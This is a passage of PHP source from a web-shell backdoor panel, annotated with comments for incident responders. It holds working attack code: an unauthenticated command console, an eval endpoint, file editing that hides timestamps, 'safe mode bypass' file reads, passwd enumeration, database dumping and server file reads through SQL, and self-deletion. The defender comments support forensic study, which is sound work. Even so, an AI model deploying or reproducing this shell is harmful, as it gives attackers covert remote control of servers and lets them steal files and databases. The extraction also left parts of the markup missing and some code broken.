while(!@feof($fp))
echo htmlspecialchars(@fread($fp,1024));
@fclose($fp);
}
echo \' \';
break;
case \'highlight\':
if(@is_readable($_POST[\'p1\'])){
echo \'
\';
$code=@highlight_file($_POST[\'p1\'],true);
echo str_replace(array(\'\'),array(\'\'),$code).\'
\';
}
break;
// Chmod: p3 is read as a string of octal digits and converted to an integer mode.
case \'chmod\':
if(!empty($_POST[\'p3\'])){
$perms=0;
for($i=strlen($_POST[\'p3\'])-1;$i>=0;--$i)
$perms += (int)$_POST[\'p3\'][$i]*pow(8,(strlen($_POST[\'p3\'])-$i-1));
if(!@chmod($_POST[\'p1\'],$perms))
echo \'Can\'t set permissions!
\';
}
clearstatcache();
echo \'
\';
break;
// Edit: the modification time is saved before the write and put back with touch afterwards, so a
// file changed through this panel keeps its old mtime. Do not rely on mtime alone in triage;
// touch cannot set the inode change time (ctime), and content hashes or backups remain reliable.
case \'edit\':
if(!is_writable($_POST[\'p1\'])){
echo \'File isn\'t writeable\';
break;
}
if(!empty($_POST[\'p3\'])){
$time=@filemtime($_POST[\'p1\']);
// The first character of p3 is dropped before the content is written.
$_POST[\'p3\']=substr($_POST[\'p3\'],1);
$fp=@fopen($_POST[\'p1\'],"w");
if($fp){
@fwrite($fp,$_POST[\'p3\']);
@fclose($fp);
echo \'Saved!
\';
@touch($_POST[\'p1\'],$time,$time);
}
}
echo \'
\';
$fp=@fopen($_POST[\'p1\'],\'r\');
if($fp){
while(!@feof($fp))
echo htmlspecialchars(@fread($fp,1024));
@fclose($fp);
}
echo \' \';
break;
// Hexdump: three columns (offset, hex bytes, text) with 32 bytes per row; bytes 0, 9, 10 and 13 are
// shown as a blank in the text column.
case \'hexdump\':
$c=@file_get_contents($_POST[\'p1\']);
$n=0;
$h=array(\'00000000
\',\'\',\'\');
$len=strlen($c);
for ($i=0; $i<$len; ++$i){
$h[1] .= sprintf(\'%02X\',ord($c[$i])).\' \';
switch (ord($c[$i])){
case 0:$h[2] .= \' \'; break;
case 9:$h[2] .= \' \'; break;
case 10: $h[2] .= \' \'; break;
case 13: $h[2] .= \' \'; break;
default: $h[2] .= $c[$i]; break;
}
$n++;
if($n==32){
$n=0;
if($i+1 < $len){$h[0] .= sprintf(\'%08X\',$i+1).\'
\';}
$h[1] .= \'
\';
$h[2] .= "
";
}
}
echo \'
\'.$h[0].\' \'.$h[1].\' \'.htmlspecialchars($h[2]).\'
\';
break;
case \'rename\':
if(!empty($_POST[\'p3\'])){
if(!@rename($_POST[\'p1\'],$_POST[\'p3\']))
echo \'Can\'t rename!
\';
else
die(\'\');
}
echo \'
\';
break;
// Touch: p3 is parsed with strtotime and applied as both modification and access time.
case \'touch\':
if(!empty($_POST[\'p3\'])){
$time=strtotime($_POST[\'p3\']);
if($time){
if(!touch($_POST[\'p1\'],$time,$time))
echo \'Fail!\';
else
echo \'Touched!\';
}else echo \'Bad time format!\';
}
clearstatcache();
echo \'
\';
break;
}
echo \'
\';
XFooter();
}
// actionSafeMode: the panel labelled "Safe mode bypass". POST p1 (1 to 5) selects one of five
// alternative ways to read files or enumerate accounts, each using a different PHP facility. They aim at
// the legacy safe_mode and open_basedir restrictions. Output is captured into $temp; the echo that
// survives in this copy does not print it, presumably because the markup was stripped.
function actionSafeMode(){
$temp=\'\';
ob_start();
switch($_POST[\'p1\']){
// 1: copy the file named by p2 through the compress.zlib stream wrapper into a temp file and print it.
// $test is not defined anywhere in this function, so tempnam receives an empty directory argument.
case 1:
$temp=@tempnam($test,\'cx\');
if(@copy("compress.zlib://".$_POST[\'p2\'],$temp)){
echo @file_get_contents($temp);
unlink($temp);
}else
echo \'Sorry... Can\'t open file\';
break;
// 2: list paths matching p2 followed by a wildcard, using glob.
case 2:
$files=glob($_POST[\'p2\'].\'*\');
if(is_array($files))
foreach ($files as $filename)
echo $filename."
";
break;
// 3: read a file through the cURL file:// handler.
case 3:
$ch=curl_init("file://".$_POST[\'p2\']." ".preg_replace(\'!\(\d+\)\s.*!\',\'\',__FILE__));
curl_exec($ch);
break;
// 4: restore the ini defaults for safe_mode and open_basedir, then include the path in p2.
// include on a request-supplied path also executes any PHP the target file contains.
case 4:
ini_restore("safe_mode");
ini_restore("open_basedir");
include($_POST[\'p2\']);
break;
// 5: walk the numeric range p2..p3 and print the passwd entry for every uid that resolves.
case 5:
for(;$_POST[\'p2\'] <= $_POST[\'p3\'];$_POST[\'p2\']++){
$uid=@posix_getpwuid($_POST[\'p2\']);
if($uid)
echo join(\':\',$uid)."
";
}
break;
}
$temp=ob_get_clean();
XHeader();
echo \'Safe mode bypass \';
XFooter();
}
// actionConsole: the command console. POST p1 is a shell command that is run through XEx; a non-empty
// p2 appends a stderr-to-stdout redirect. In AJAX mode the reply is a script fragment prefixed by its
// length. No authentication check is visible in this function.
function actionConsole(){
// Remember per host whether stderr is merged into the output.
if(!empty($_POST[\'p1\'])&&!empty($_POST[\'p2\'])){
$_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'stderr_to_out\']=true;
$_POST[\'p1\'] .= \' 2>&1\';
}elseif(!empty($_POST[\'p1\']))
$_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'stderr_to_out\']=false;
if(isset($_POST[\'ajax\'])){
$_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']=true;
ob_start();
echo "d.cf.cmd.value=\'\';
";
// The command is executed here; its output is escaped for a script string and converted from the
// request charset to UTF-8.
$temp=@iconv($_POST[\'charset\'],\'UTF-8\',addcslashes("
$ ".$_POST[\'p1\']."
".XEx($_POST[\'p1\']),"
\\' "));
// A command ending in "cd <dir>" also changes the working directory of the PHP process and
// reports the new path back to the page.
if(preg_match("!.*cd\s+([^;]+)$!",$_POST[\'p1\'],$match)){
if(@chdir($match[1])){
$GLOBALS[\'cwd\']=@getcwd();
echo "c_=\'".$GLOBALS[\'cwd\']."\';";
}
}
echo "d.cf.output.value+=\'".$temp."\';";
echo "d.cf.output.scrollTop=d.cf.output.scrollHeight;";
$temp=ob_get_clean();
echo strlen($temp),"
",$temp;
exit;
}
// Non-AJAX path: only the page frame survives in this copy; the console form markup is missing.
XHeader();
echo "";
echo \'Console \';
XFooter();
}
// actionLogout: destroys the PHP session and stops with the text "bye!".
function actionLogout(){
session_destroy();
die(\'bye!\');
}
// actionSelfRemove: deletes the script file itself when POST p1 is "yes"; otherwise prints a
// confirmation page. The regular expression strips a "(digits) ..." suffix from __FILE__ first,
// presumably to recover the real path when the code runs inside eval.
// For responders: the file may already be gone by the time of triage, so access logs, backups and
// file-integrity records are the evidence to preserve.
function actionSelfRemove(){
if($_POST[\'p1\']==\'yes\')
if(@unlink(preg_replace(\'!\(\d+\)\s.*!\',\'\',__FILE__)))
die(\'Shell has been removed\');
else
echo \'unlink error!\';
if($_POST[\'p1\']!=\'yes\')
XHeader();
echo \'Suicide Really want to remove the shell?
Yes \';
XFooter();
}
// actionSql: the database panel. It declares a small MySQL/PostgreSQL wrapper class (DbClass), then
// either dumps the requested tables (p2 = download) or prints the browser page. Host, login, password
// and database name all come from the request, so the panel can reach any database the web server can
// reach with credentials the operator already holds. No authentication check is visible here.
function actionSql(){
// DbClass: thin wrapper over the legacy mysql_* and pg_* functions, selected by $type.
class DbClass {
var $type;
var $link;
var $res;
function DbClass($type){
$this->type=$type;
}
// Opens a connection; for pgsql the host may carry a port after a colon, defaulting to 5432.
function connect($host,$user,$pass,$dbname){
switch($this->type){
case \'mysql\':
if($this->link=@mysql_connect($host,$user,$pass,true)) return true;
break;
case \'pgsql\':
$host=explode(\':\',$host);
if(!$host[1]) $host[1]=5432;
if($this->link=@pg_connect("host={$host[0]}port={$host[1]}user=$user password=$pass dbname=$dbname")) return true;
break;
}
return false;
}
function selectdb($db){
switch($this->type){
case \'mysql\':
if(@mysql_select_db($db))return true;
break;
}
return false;
}
// Runs a raw SQL string and stores the result handle in $this->res.
function query($str){
switch($this->type){
case \'mysql\':
return $this->res=@mysql_query($str);
break;
case \'pgsql\':
return $this->res=@pg_query($this->link,$str);
break;
}
return false;
}
// Fetches the next row as an associative array, from the given result or from the last query.
function fetch(){
$res=func_num_args()?func_get_arg(0):$this->res;
switch($this->type){
case \'mysql\':
return @mysql_fetch_assoc($res);
break;
case \'pgsql\':
return @pg_fetch_assoc($res);
break;
}
return false;
}
function listDbs(){
switch($this->type){
case \'mysql\':
return $this->query("SHOW databases");
break;
case \'pgsql\':
return $this->res=$this->query("SELECT datname FROM pg_database WHERE datistemplate!=\'t\'");
break;
}
return false;
}
function listTables(){
switch($this->type){
case \'mysql\':
return $this->res=$this->query(\'SHOW TABLES\');
break;
case \'pgsql\':
return $this->res=$this->query("select table_name from information_schema.tables where table_schema!=\'information_schema\' AND table_schema!=\'pg_catalog\'");
break;
}
return false;
}
function error(){
switch($this->type){
case \'mysql\':
return @mysql_error();
break;
case \'pgsql\':
return @pg_last_error();
break;
}
return false;
}
function setCharset($str){
switch($this->type){
case \'mysql\':
if(function_exists(\'mysql_set_charset\'))
return @mysql_set_charset($str,$this->link);
else
$this->query(\'SET CHARSET \'.$str);
break;
case \'pgsql\':
return @pg_set_client_encoding($this->link,$str);
break;
}
return false;
}
// Reads a file from the database server through SQL: LOAD_FILE on MySQL, COPY into a scratch table
// named X2 on PostgreSQL. Both depend on server-side file privileges of the database account, so
// least-privilege application accounts limit this path. A leftover X2 table is a possible artefact
// if the final drop does not run.
function loadFile($str){
switch($this->type){
case \'mysql\':
return $this->fetch($this->query("SELECT LOAD_FILE(\'".addslashes($str)."\') as file"));
break;
case \'pgsql\':
$this->query("CREATE TABLE X2(file text);COPY X2 FROM \'".addslashes($str)."\';select file from X2;");
$r=array();
while($i=$this->fetch())
$r[]=$i[\'file\'];
$this->query(\'drop table X2\');
return array(\'file\'=>implode("
",$r));
break;
}
return false;
}
// Writes a table as SQL text to $fp, or to the output when $fp is false. For MySQL it emits the
// CREATE TABLE statement followed by one multi-row INSERT; for PostgreSQL one INSERT per row.
// The table name is concatenated into the queries as given.
function dump($table,$fp=false){
switch($this->type){
case \'mysql\':
$res=$this->query(\'SHOW CREATE TABLE `\'.$table.\'`\');
$create=mysql_fetch_array($res);
$sql=$create[1].";
";
if($fp) fwrite($fp,$sql); else echo($sql);
$this->query(\'SELECT * FROM `\'.$table.\'`\');
$head=true;
while($item=$this->fetch()){
$columns=array();
foreach($item as $k=>$v){
if($v==null)
$item[$k]="NULL";
elseif(is_numeric($v))
$item[$k]=$v;
else
$item[$k]="\'".@mysql_real_escape_string($v)."\'";
$columns[]="`".$k."`";
}
if($head){
$sql=\'INSERT INTO `\'.$table.\'` (\'.implode(",",$columns).") VALUES
(".implode(",",$item).\')\';
$head=false;
}else
$sql="
,(".implode(",",$item).\')\';
if($fp) fwrite($fp,$sql); else echo($sql);
}
if(!$head)
if($fp) fwrite($fp,";
"); else echo(";
");
break;
case \'pgsql\':
$this->query(\'SELECT * FROM \'.$table);
while($item=$this->fetch()){
$columns=array();
foreach($item as $k=>$v){
$item[$k]="\'".addslashes($v)."\'";
$columns[]=$k;
}
$sql=\'INSERT INTO \'.$table.\' (\'.implode(",",$columns).\') VALUES (\'.implode(",",$item).\');\'."
";
if($fp) fwrite($fp,$sql); else echo($sql);
}
break;
}
return false;
}
};
$db=new DbClass($_POST[\'type\']);
// Download mode: connect with request-supplied credentials and dump the tables listed in POST tbl,
// either to the HTTP response as dump.sql or to the server-side path given in POST file.
// For defenders: a large gzip-compressed response to a POST on a single PHP file, or a new .sql file
// under the web root, are the observables for this path.
if(@$_POST[\'p2\']==\'download\'){
$db->connect($_POST[\'sql_host\'],$_POST[\'sql_login\'],$_POST[\'sql_pass\'],$_POST[\'sql_base\']);
$db->selectdb($_POST[\'sql_base\']);
switch($_POST[\'charset\']){
case "Windows-1251": $db->setCharset(\'cp1251\'); break;
case "UTF-8": $db->setCharset(\'utf8\'); break;
case "KOI8-R": $db->setCharset(\'koi8r\'); break;
case "KOI8-U": $db->setCharset(\'koi8u\'); break;
case "cp866": $db->setCharset(\'cp866\'); break;
}
if(empty($_POST[\'file\'])){
ob_start("ob_gzhandler",4096);
header("Content-Disposition: attachment; filename=dump.sql");
header("Content-Type: text/plain");
foreach($_POST[\'tbl\'] as $v)
$db->dump($v);
exit;
}elseif($fp=@fopen($_POST[\'file\'],\'w\')){
foreach($_POST[\'tbl\'] as $v)
$db->dump($v,$fp);
fclose($fp);
unset($_POST[\'p2\']);
}else
die(\'\');
}
XHeader();
echo "
Sql browser
";
// NOTE(review): outside download mode no connect call is visible in this copy, so $db->link would be
// unset here; presumably the browser form markup and its connect step were lost in extraction.
if(isset($db)&&$db->link){
echo " ";
// On MySQL, check whether the current account holds File_priv before offering the load-file form.
if($_POST[\'type\']==\'mysql\'){
$db->query("SELECT 1 FROM mysql.user WHERE concat(`user`,\'@\',`host`)=USER() AND `File_priv`=\'y\'");
if($db->fetch())
echo "
Load file >\'>";
}
if(@$_POST[\'p1\']==\'loadfile\'){
$file=$db->loadFile($_POST[\'p2\']);
echo \'
\'.htmlspecialchars($file[\'file\']).\' \';
}
}else {
echo htmlspecialchars($db->error());
}
echo \'
\';
XFooter();
}
// actionRC: a machine-facing endpoint with no page output. Without POST p1 it returns a serialized
// fingerprint (uname, PHP version, X_VERSION, safe_mode); with p1 it passes the value to eval.
// It is not listed in the menu built by XHeader, but the dispatcher reaches it like any other action.
// NOTE(review): the constant X_VERSION is not defined anywhere in the visible source.
function actionRC(){
if(!@$_POST[\'p1\']){
$a=array(
"uname"=>php_uname(),
"php_version"=>phpversion(),
"X_version"=>X_VERSION,
"safemode"=>@ini_get(\'safe_mode\')
);
echo serialize($a);
}else {
eval($_POST[\'p1\']);
}
}
// Dispatcher: POST a names the action; the function action<a> is called when it exists. With no a the
// default action is used (FilesMan here), falling back to SecInfo. Nothing in this copy checks a
// password or session before dispatch, so every action is reachable by any client that is not caught
// by the crawler filter at the top. For log review, the pattern is repeated POST requests to one PHP
// file with short parameter names (a, c, p1, p2, p3, charset).
if(empty($_POST[\'a\']))if(isset($default_action)&&function_exists(\'action\'.$default_action))$_POST[\'a\']=$default_action;else$_POST[\'a\']=\'SecInfo\';if(!empty($_POST[\'a\'])&&function_exists(\'action\'.$_POST[\'a\']))call_user_func(\'action\'.$_POST[\'a\']);exit;'//